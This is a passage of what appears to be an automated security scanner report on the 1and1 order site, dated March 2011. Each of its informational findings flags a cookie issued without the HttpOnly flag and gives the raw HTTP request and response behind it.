Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.7. http://order.1and1.com/xml/order/Contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Contact HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=10de75d96fe89000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Contact;jsessionid=294ADA4924BDE22465D7CF384C1F0CF1.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.8. http://order.1and1.com/xml/order/Domaininfo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:18 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:51:26 GMT; Path=/
ETag: e798faa6f23cc4cbfdd5cb74e552057f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20508


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.9. http://order.1and1.com/xml/order/Domaininfo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Domaininfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Domaininfo HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=79161ecc06ae0c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Domaininfo;jsessionid=073389361EEDA54793A65D36511F2C39.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.10. http://order.1and1.com/xml/order/DomaininfoMove  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:49 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:37:56 GMT; Path=/
ETag: d905b74707fbe92fe8473f766eeb9ddf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23686


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.11. http://order.1and1.com/xml/order/DomaininfoMove  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/DomaininfoMove HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=69cc255bf110d400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove;jsessionid=5D87D3355F186E87A28F3433AA76964D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.12. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Eshops HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=17a1be1e9220e400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops;jsessionid=93E7519C57903B3695EBCA6C365B1E4A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.13. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 864e2e4f35ed6ab3549b3f5dceba36dd
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64223


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsChat HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:48 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7e3e5cc19ca64c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsChat;jsessionid=98481BE7B1BAD40F34B26AECE3954431.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsDialogue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:53 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=74fc0aa587c04000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue;jsessionid=6DF937C1E40F46F9A945480B8F746B9E.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 22:00:10 GMT; Path=/
ETag: a829bbc7520903930ff28daacf019702
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18884


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

